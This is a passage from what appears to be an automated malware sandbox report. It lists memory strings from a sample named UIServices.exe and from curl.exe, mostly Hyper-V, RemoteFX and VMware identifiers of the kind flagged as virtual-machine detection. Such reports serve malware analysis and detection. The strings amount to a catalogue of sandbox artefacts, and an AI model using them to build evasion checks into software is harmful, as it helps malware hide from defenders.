Workflow Load Time7362Average Workflow Load Time Base7364Average Workflow Persist Time7366Average Workflow Persist Time Base8154Terminal Services8156Active Sessions8158Inactive Sessions8160Total Sessions5200Hyper-V Hypervisor Logical Processor5202Global Time5204Total Run Time5206Hypervisor Run Time5208Hardware Interrupts/sec5210Context Switches/sec5212Inter-Processor Interrupts/sec5214Scheduler Interrupts/sec5216Timer Interrupts/sec5218Inter-Processor Interrupts Sent/sec5220Processor Halts/sec5222Monitor Transition Cost5224Context Switch Time5226C1 Transitions/sec5228% C1 Time5230C2 Transitions/sec5232% C2 Time5234C3 Transitions/sec5236% C3 Time5238Frequency5240% of Max Frequency5242Parking Status5244Processor State Flags5246Root Vp Index5248Idle Sequence Number5250Global TSC Count5252Active TSC Count5254Idle Accumulation5256Reference Cycle Count 05258Actual Cycle Count 05260Reference Cycle Count 15262Actual Cycle Count 15264Proximity Domain Id5266Posted Interrupt Notifications/sec5268Guest Run Time5270Idle Time5272% Total Run Time5274% Hypervisor Run Time5276% Guest Run Time5278% Idle Time5280Total Interrupts/sec5182Hyper-V Hypervisor5184Logical Processors5186Partitions5188Total Pages5190Virtual Processors5192Monitored Notifications5194Modern Standby Entries5196Platform Idle Transitions5198HypervisorStartupCost5282Hyper-V Hypervisor Root Partition5284Virtual Processors5286Virtual TLB Pages5288Address Spaces5290Deposited Pages5292GPA Pages5294GPA Space Modifications/sec5296Virtual TLB Flush Entires/sec5298Recommended Virtual
Source: UIServices.exe, 00000027.00000002.342496999.0000029C1C513000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000003.336526672.0000029C1EAB2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V umvqqnfqcihjvfn Bus#{
Source: UIServices.exe, 0000002F.00000003.392418292.0000027DB7399000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401663607.0000027DB5079000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DHyper-V Virtual Machine Bus PipesOc
Source: curl.exe, 0000000E.00000002.265338006.00000237F57CB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
Source: UIServices.exe, 00000027.00000003.336480991.0000029C1EA9D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342452343.0000029C1C4FE000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401570207.0000027DB505C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.390667733.0000027DB737C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455899726.0000018E5878C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.451949537.0000018E5AC7A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VHyper-V Virtual Machine Bus Provider Pipes
Source: UIServices.exe, 00000039.00000003.452156375.0000018E5ACFA000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.456053891.0000018E5880C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.454503254.0000018E5880C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: JHyper-V Hypervisor Logical ProcessorH
Source: UIServices.exe, 00000039.00000002.456342969.0000018E5A629000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 8258RemoteFX Synth3D VSC VM Transport Channel8260Number of space available signals received8262Number of space available signals received per second8264Number of data available signals received8266Number of data available signals received per second8268Number of space available signals sent8270Number of space available signals sent per second8272Number of data available signals sent8274Number of data available signals sent per second8276Number of data available event was reset8278Number of data available event was reset per second8280Number of space available event was reset8282Number of space available event was reset per second8244RemoteFX Synth3D VSC VM Device8246Number of created VMT channels8248Number of waiting VMT channels8250Number of connected VMT channels8252Number of disconnected VMT channels8254Total number of created VMT channels8256Number of RDVGM restarted notifications7320WorkflowServiceHost 4.0.0.07322Workflows Created7324Workflows Created Per Second7326Workflows Executing7328Workflows Completed7330Workflows Completed Per Second7332Workflows Aborted7334Workflows Aborted Per Second7336Workflows In Memory7338Workflows Persisted7340Workflows Persisted Per Second7342Workflows Terminated7344Workflows Terminated Per Second7346Workflows Loaded7348Workflows Loaded Per Second7350Workflows Unloaded7352Workflows Unloaded Per Second7354Workflows Suspended7356Workflows Suspended Per Second7358Workflows Idle Per Second7360Average Workflow Load Time7362Average Workflow Load Time Base7364Average Workflow Persist Time7366Average Workflow Persist Time Base8154Terminal Services8156Active Sessions8158Inactive Sessions8160Total Sessions5200Hyper-V Hypervisor Logical Processor5202Global Time5204Total Run Time5206Hypervisor Run Time5208Hardware Interrupts/sec5210Context Switches/sec5212Inter-Processor Interrupts/sec5214Scheduler Interrupts/sec5216Timer Interrupts/secg
Source: UIServices.exe, 0000002F.00000003.390521901.0000027DB7348000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401468831.0000027DB5028000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Root Partitione
Source: UIServices.exe, 00000027.00000003.323552275.0000029C1E207000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000003.323297174.0000029C1E207000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 5266Posted Interrupt Notifications/sec5268Guest Run Time5270Idle Time5272% Total Run Time5274% Hypervisor Run Time5276% Guest Run Time5278% Idle Time5280Total Interrupts/sec5182Hyper-V Hypervisor5184Logical Processors5186Partitions5188Total Pages5190Virtual Processors5192Monitored Notifications
Source: UIServices.exe, 00000039.00000003.451814280.0000018E5AC46000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455773561.0000018E58758000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: JHyper-V Hypervisor Logical Processor2
Source: UIServices.exe, 00000027.00000003.336409090.0000029C1EA67000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342323734.0000029C1C4C8000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.390521901.0000027DB7348000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401468831.0000027DB5028000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.392418292.0000027DB7399000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401663607.0000027DB5079000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.452049067.0000018E5AC90000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455972358.0000018E587A2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Root Virtual Processor
Source: UIServices.exe, 00000027.00000003.336480991.0000029C1EA9D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342452343.0000029C1C4FE000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401570207.0000027DB505C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.390667733.0000027DB737C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: THyper-V Hypervisor Root Virtual Processor
Source: UIServices.exe, 00000027.00000003.336480991.0000029C1EA9D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342452343.0000029C1C4FE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VHyper-V Dynamic Memory Integration Service=UJa
Source: UIServices.exe, 00000039.00000002.455899726.0000018E5878C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.451949537.0000018E5AC7A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Virtual Machine Bus Pipes]G~Q
Source: UIServices.exe, 00000027.00000002.342535670.0000029C1C57B000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000003.340784828.0000029C1C575000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000003.336592757.0000029C1EB1A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V umvqqnfqcihjvfn Bus PipesQ`
Source: UIServices.exe, 00000027.00000003.335379625.0000029C1E499000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CXowsstore_8wekyb3d8bbwe\AC\INetCookies\ESE\acturerName=&smBiosManufacturerName=VMware%2C+Inc.&phoneDeviceModel=&smBiosDm=VMware7%2C1
Source: UIServices.exe, 00000027.00000003.336480991.0000029C1EA9D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342452343.0000029C1C4FE000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455899726.0000018E5878C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.451949537.0000018E5AC7A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: THyper-V Hypervisor Root Virtual Processor
Source: UIServices.exe, 00000027.00000003.336480991.0000029C1EA9D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342452343.0000029C1C4FE000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.392418292.0000027DB7399000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401663607.0000027DB5079000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: JHyper-V Hypervisor Logical Processor
Source: UIServices.exe, 00000027.00000003.336607466.0000029C1EB23000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342553796.0000029C1C584000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000003.340825483.0000029C1C584000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Virtual Machine Bus Provider Pipesq
Source: UIServices.exe, 00000027.00000003.336480991.0000029C1EA9D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342452343.0000029C1C4FE000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.392418292.0000027DB7399000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401663607.0000027DB5079000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.452156375.0000018E5ACFA000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.456053891.0000018E5880C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.454503254.0000018E5880C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sWDHyper-V Hypervisor Root Partition
Source: UIServices.exe, 0000002F.00000003.390521901.0000027DB7348000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401468831.0000027DB5028000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Logical ProcessorA
Source: UIServices.exe, 00000027.00000003.336480991.0000029C1EA9D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342452343.0000029C1C4FE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DHyper-V Hypervisor Root Partition
Source: UIServices.exe, 00000039.00000002.455899726.0000018E5878C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.451949537.0000018E5AC7A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Virtual Machine Bus Pipes=D
Source: UIServices.exe, 00000039.00000003.452156375.0000018E5ACFA000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.456053891.0000018E5880C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.454503254.0000018E5880C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &Hyper-V Hypervisor
Source: UIServices.exe, 00000039.00000003.437083705.0000018E5A611000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.436830567.0000018E5A611000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.436514987.0000018E5A611000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t5282Hyper-V Hypervisor Root Partition5284Virtual Proces
Source: UIServices.exe, 00000039.00000003.451814280.0000018E5AC46000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455773561.0000018E58758000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Logical ProcessorV
Source: UIServices.exe, 00000027.00000002.342535670.0000029C1C57B000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000003.340784828.0000029C1C575000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000003.336592757.0000029C1EB1A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Dynamic Memory Integration Service^`
Source: UIServices.exe, 00000027.00000002.342496999.0000029C1C513000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000003.336526672.0000029C1EAB2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Virtual Machine Bus Provider PipesLy
Source: UIServices.exe, 00000027.00000003.336607466.0000029C1EB23000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342553796.0000029C1C584000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000003.340825483.0000029C1C584000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.400158471.0000027DB50DD000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.392469286.0000027DB7400000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401720587.0000027DB50E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VHyper-V Virtual Machine Bus Provider Pipes
Source: UIServices.exe, 00000027.00000003.336480991.0000029C1EA9D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342452343.0000029C1C4FE000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401570207.0000027DB505C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.390667733.0000027DB737C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455899726.0000018E5878C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.451949537.0000018E5AC7A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &Hyper-V Hypervisor
Source: UIServices.exe, 00000027.00000003.336607466.0000029C1EB23000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342553796.0000029C1C584000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000003.340825483.0000029C1C584000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &Hyper-V Hypervisor$
Source: UIServices.exe, 00000039.00000002.455383437.000000806CD4A000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: VMWare@
Source: UIServices.exe, 00000027.00000003.336409090.0000029C1EA67000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342323734.0000029C1C4C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Logical ProcessorT
Source: curl.exe, 00000009.00000003.257996903.000001778212F000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000002.258236371.0000017782132000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.451814280.0000018E5AC46000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455773561.0000018E58758000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: UIServices.exe, 00000039.00000002.455899726.0000018E5878C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.451949537.0000018E5AC7A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: THyper-V Hypervisor Root Virtual Processor-B
Source: UIServices.exe, 00000027.00000003.327346477.0000029C1E76D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: r&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d
Source: UIServices.exe, 00000039.00000003.451814280.0000018E5AC46000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455773561.0000018E58758000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Root Virtual Processor4
Source: UIServices.exe, 00000027.00000003.336480991.0000029C1EA9D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342452343.0000029C1C4FE000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.392418292.0000027DB7399000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401663607.0000027DB5079000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.452156375.0000018E5ACFA000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.456053891.0000018E5880C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.454503254.0000018E5880C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AlDHyper-V Virtual Machine Bus Pipes
Source: UIServices.exe, 0000002F.00000003.400158471.0000027DB50DD000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.392469286.0000027DB7400000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.392418292.0000027DB7399000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401720587.0000027DB50E0000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401663607.0000027DB5079000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.452049067.0000018E5AC90000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455972358.0000018E587A2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Virtual Machine Bus Provider Pipes
Source: UIServices.exe, 00000027.00000003.336409090.0000029C1EA67000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342323734.0000029C1C4C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll&&n9
Source: UIServices.exe, 0000002F.00000003.379294802.0000027DB6E13000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.379026905.0000027DB6E13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: oteFX Synth3D VSC VM Transport Channel8260Number of space available signals received8262Number of space available signals received per second8264Number of data available signals received8266Number of data available signals received per second8268Number of space available signals sent8270Number of space available signals sent per second8272Number of data available signals sent8274Number of data available signals sent per second8276Number of data available event was reset8278Number of data available event was reset per second8280Number of space available event was reset8282Number of space available event was reset per second8244RemoteFX Synth3D VSC VM Device8246Number of created VMT channels8248Number of waiting VMT channels8250Number of connected VMT channels8252Number of disconnected VMT channels8254Total number of created VMT channels8256Number of RDVGM restarted notifications7320WorkflowServiceHost 4.0.0.07322Workflows Created7324Workflows Created Per Second7326Workflows Executing7328Workflows Completed7330Workflows Completed Per Second7332Workflows Aborted7334Workflows Aborted Per Second7336Workflows In Memory7338Workflows Persisted7340Workflows Persisted Per Second7342Workflows Terminated7344Workflows Terminated Per Second7346Workflows Loaded7348Workflows Loaded Per Second7350Workflows Unloaded7352Workflows Unloaded Per Second7354Workflows Suspended7356Workflows Suspended Per Second7358Workflows Idle Per Second7360Average Workflow Load Time7362Average Workflow Load Time Base7364Average Workflow Persist Time7366Average Workflow Persist Time Base8154Terminal Services8156Active Sessions8158Inactive Sessions8160Total Sessions5200Hyper-V Hypervisor Logical Processor5202Global Time5204Total Run Time5206Hypervisor Run Time5208Hardware Interrupts/sec5210Context Switches/sec5212Inter-Processor Interrupts/sec5214Scheduler Interrupts/sec5216Timer Interrupts/sec
Source: UIServices.exe, 00000039.00000003.452156375.0000018E5ACFA000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.456053891.0000018E5880C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.454503254.0000018E5880C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Virtual Machine Bus Provider PipesU
Source: UIServices.exe, 00000039.00000003.452049067.0000018E5AC90000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455972358.0000018E587A2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V umvqqnfqcihjvfn Bus Provider Pipes
Source: UIServices.exe, 00000027.00000002.342496999.0000029C1C513000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000003.336526672.0000029C1EAB2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Root Virtual ProcessorZy
Source: UIServices.exe, 00000039.00000002.455383437.000000806CD4A000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: VMWare
Source: UIServices.exe, 00000027.00000002.342496999.0000029C1C513000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000003.336526672.0000029C1EAB2000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.392418292.0000027DB7399000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401663607.0000027DB5079000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.452049067.0000018E5AC90000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455972358.0000018E587A2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Logical Processor
Source: UIServices.exe, 00000027.00000002.342496999.0000029C1C513000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000003.336526672.0000029C1EAB2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V umvqqnfqcihjvfn Bus Provider PipesX`
Source: UIServices.exe, 0000002F.00000003.390521901.0000027DB7348000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401468831.0000027DB5028000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlluu2
Source: UIServices.exe, 0000002F.00000003.379294802.0000027DB6E13000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.379026905.0000027DB6E13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: r-Processor Interrupts Sent/sec5220Processor Halts/sec5222Monitor Transition Cost5224Context Switch Time5226C1 Transitions/sec5228% C1 Time5230C2 Transitions/sec5232% C2 Time5234C3 Transitions/sec5236% C3 Time5238Frequency5240% of Max Frequency5242Parking Status5244Processor State Flags5246Root Vp Index5248Idle Sequence Number5250Global TSC Count5252Active TSC Count5254Idle Accumulation5256Reference Cycle Count 05258Actual Cycle Count 05260Reference Cycle Count 15262Actual Cycle Count 15264Proximity Domain Id5266Posted Interrupt Notifications/sec5268Guest Run Time5270Idle Time5272% Total Run Time5274% Hypervisor Run Time5276% Guest Run Time5278% Idle Time5280Total Interrupts/sec5182Hyper-V Hypervisor5184Logical Processors5186Partitions5188Total Pages5190Virtual Processors5192Monitored Notifications5194Modern Standby Entries5196Platform Idle Transitions5198HypervisorStartupCost5282Hyper-V Hypervisor Root Partition5284Virtual Processors5286Virtual TLB Pages5288Address Spaces5290Deposited Pages5292GPA Pages5294GPA Space Modifications/sec5296Virtual TLB Flush Entires/sec5298Recommended Virtual TLB Size53004K GPA pages53022M GPA pages53041G GPA pages5306512G GPA pages53084K device pages53102M device pages53121G device pages5314512G device pages5316Attached Devices5318Device Interrupt Mappings5320I/O TLB Flushes/sec5322I/O TLB Flush Cost5324Device Interrupt Errors5326Device DMA Errors5328Device Interrupt Throttle Events5330Skipped Timer Ticks5332Partition Id5334Nested TLB Size5336Recommended Nested TLB Size5338Nested TLB Free List Size5340Nested TLB Trimmed Pages/sec5342I/O TLB Flushes Base5344Hyper-V Hypervisor Root Virtual Processor5346Total Run Time5348Hypervisor Run Time5350Remote Node Run Time5352Normalized Run Time5354Hypercalls/sec5356Hypercalls Cost5358Page Invalidations/sec5360Page Invalidations Cost5362Control Register Accesses/sec5364Control Register Accesses Cost5366IO Instructions/sec5368IO Instructions Cost5370HLT Instructions/sec5372HLT Instructions Cost5374MWAIT Instructions/sec5376MWAIT Instructions Cost5378CPUID Instructions/sec5380CPUID Instructions Cost5382MSR Accesses/sec5384MSR Accesses Cost5386Other Intercepts/sec5388Other Intercepts Cost5390External Interrupts/sec5392External Interrupts Cost5394Pending Interrupts/sec5396Pending Interrupts Cost5398Emulated Instructions/sec5400Emulated Instructions Cost5402Debug Register Accesses/sec5404Debug Register Accesses Cost5406Page Fault Intercepts/sec5408Page Fault Intercepts Cost5410Guest Page Table Maps/sec5412Large Page TLB Fills/sec5414Small Page TLB Fills/sec5416Reflected Guest Page Faults/sec5418APIC MMIO Accesses/sec5420IO Intercept Messages/sec5422Memory Intercept Messages/sec5424APIC EOI Accesses/sec5426Other Messages/sec5428Page Table Allocations/sec5430Logical Processor Migrations/sec5432Address Space Evictions/sec5434Address Space Switches/sec5436Address Domain Flushes/sec5438Address Space Flushes/sec5440Global GVA Range Flushes/sec5442Local Flushed GVA Ranges/sec5444Page Tabl
Source: UIServices.exe, 00000027.00000003.336409090.0000029C1EA67000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000003.336480991.0000029C1EA9D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342452343.0000029C1C4FE000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342323734.0000029C1C4C8000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401570207.0000027DB505C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.390667733.0000027DB737C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.392418292.0000027DB7399000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401663607.0000027DB5079000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455899726.0000018E5878C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.451949537.0000018E5AC7A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor
Source: UIServices.exe, 0000002F.00000003.392418292.0000027DB7399000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401663607.0000027DB5079000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Dynamic Memory Integration Service'o
Source: UIServices.exe, 0000002F.00000003.390521901.0000027DB7348000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401468831.0000027DB5028000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Root Partition&
Source: UIServices.exe, 00000039.00000003.437101679.0000018E5A644000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: cessor Halts/sec5222Monitor Transition Cost5224Context Switch Time5226C1 Transitions/sec5228% C1 Time5230C2 Transitions/sec5232% C2 Time5234C3 Transitions/sec5236% C3 Time5238Frequency5240% of Max Frequency5242Parking Status5244Processor State Flags5246Root Vp Index5248Idle Sequence Number5250Global TSC Count5252Active TSC Count5254Idle Accumulation5256Reference Cycle Count 05258Actual Cycle Count 05260Reference Cycle Count 15262Actual Cycle Count 15264Proximity Domain Id5266Posted Interrupt Notifications/sec5268Guest Run Time5270Idle Time5272% Total Run Time5274% Hypervisor Run Time5276% Guest Run Time5278% Idle Time5280Total Interrupts/sec5182Hyper-V Hypervisor5184Logical Processors5186Partitions5188Total Pages5190Virtual Processors5192Monitored Notifications5194Modern Standby Entries5196Platform Idle Transitions5198HypervisorStartupCost5282Hyper-V Hypervisor Root Partition5284Virtual Processors5286Virtual TLB Pages5288Address Spaces5290Deposited Pages5292GPA Pages5294GPA Space Modifications/sec5296Virtual TLB Flush Entires/sec5298Recommended Virtual TLB Size53004K GPA pages53022M GPA pages53041G GPA pages5306512G GPA pages53084K device pages53102M device pages53121G device pages5314512G device pages5316Attached Devices5318Device Interrupt Mappings5320I/O TLB Flushes/sec5322I/O TLB Flush Cost5324Device Interrupt Errors5326Device DMA Errors5328Device Interrupt Throttle Events5330Skipped Timer Ticks5332Partition Id5334Nested TLB Size5336Recommended Nested TLB Size5338Nested TLB Free List Size5340Nested TLB Trimmed Pages/sec5342I/O TLB Flushes Base5344Hyper-V Hypervisor Root Virtual Processor5346Total Run Time5348Hypervisor Run Time5350Remote Node Run Time5352Normalized Run Time5354Hypercalls/sec5356Hypercalls Cost5358Page Invalidations/sec5360Page Invalidations Cost5362Control Register Accesses/sec5364Control Register Accesses Costm
Source: curl.exe, 0000000A.00000003.257252677.000001840CB50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllhh
Source: UIServices.exe, 0000002F.00000003.400158471.0000027DB50DD000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.392469286.0000027DB7400000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401720587.0000027DB50E0000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455899726.0000018E5878C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.451949537.0000018E5AC7A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V umvqqnfqcihjvfn Bus

Source: C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\UIServices.exe

Memory allocated: page read and write | page guard

Jump to behavior

